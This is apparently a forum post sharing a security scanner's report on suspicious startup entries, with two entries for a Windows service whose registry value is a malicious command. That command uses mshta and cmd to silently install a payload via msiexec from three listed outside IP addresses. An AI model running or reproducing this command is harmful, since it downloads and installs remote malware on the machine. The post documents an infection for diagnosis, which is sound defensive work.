本帖最后由 沧桑浪子 于 2022-7-9 10:10 编辑
类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序,存在潜在安全风险,且会影响系统的运行速度。如果您确认其需要自动运行,请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\System32\mshta.exe
文件大小:12K (12,288 字节)
文件版本:9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
文件描述:Microsoft (R) HTML Application host
文件指纹(MD5):e49ec15effc9f01298093dbd7e0a31af
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vb:createobject(w.shell).run(Cmd /c for /d %i in (61.174.50.5:13321 177.137.96.14:12264 78.141.219.184:17508 ) do Msiexec /i http://%i/F12E5CE5.Png /Q,0)(window.close)
处理建议:禁止自启动
类型:无需启动的程序-建议禁止开机自动运行的程序
描述:此类程序为未知且非必需的开机自动运行程序,存在潜在安全风险,且会影响系统的运行速度。如果您确认其需要自动运行,请加入“信任程序列表”。
扫描引擎:云安全引擎
文件路径:C:\Windows\System32\cmd.exe
文件大小:337K (345,088 字节)
文件版本:6.1.7601.17514 (win7sp1_rtm.101119-1850)
文件描述:Windows Command Processor
文件指纹(MD5):5746bd7e255dd6a8afa06f7c42c1ba41
组别:服务
数字签名:Microsoft Windows
数字签名是否有效:有效
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\AC08
注册表名称:ImagePath
注册表值:mshta.exe vb:createobject(w.shell).run(Cmd /c for /d %i in (61.174.50.5:13321 177.137.96.14:12264 78.141.219.184:17508 ) do Msiexec /i http://%i/F12E5CE5.Png /Q,0)(window.close)
处理建议:禁止自启动
|
|
|
|
评论
直达楼层